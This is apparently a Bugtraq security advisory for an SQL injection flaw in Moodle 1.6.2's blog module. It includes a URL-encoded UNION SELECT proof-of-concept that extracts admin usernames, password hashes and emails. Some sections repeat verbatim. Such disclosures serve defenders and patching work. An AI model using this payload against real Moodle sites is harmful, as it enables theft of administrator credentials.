Moodle Blog Module SQL Injection Vulnerability
BID:20395
Info
Moodle Blog Module SQL Injection Vulnerability
| Bugtraq ID: | 20395 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 08 2006 12:00AM |
| Updated: | Oct 11 2006 06:54PM |
| Credit: | disfigure <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
Moodle moodle 1.6.2 Moodle moodle 1.18.2.2 |
| Not Vulnerable: |
Moodle moodle 1.18.2.3 |
Discussion
Moodle Blog Module SQL Injection Vulnerability
Moodle is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Moodle 1.6.2 is reported vulnerable; prior versions may also be affected.
Moodle is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Moodle 1.6.2 is reported vulnerable; prior versions may also be affected.
Exploit / POC
Moodle Blog Module SQL Injection Vulnerability
An attacker can exploit this vulnerability using a web client.
The following proof of concept is available:
http://www.example.com/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20
FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20F
ROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271
An attacker can exploit this vulnerability using a web client.
The following proof of concept is available:
http://www.example.com/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20
FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20F
ROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271
Solution / Fix
References
Moodle Blog Module SQL Injection Vulnerability
References:
References:
- Moodle Home Page (Moodle)
- Re: [Full-disclosure] SQL injection - moodle ("scsantos@unigranrio com br"
) - SQL injection - moodle (disfigure
)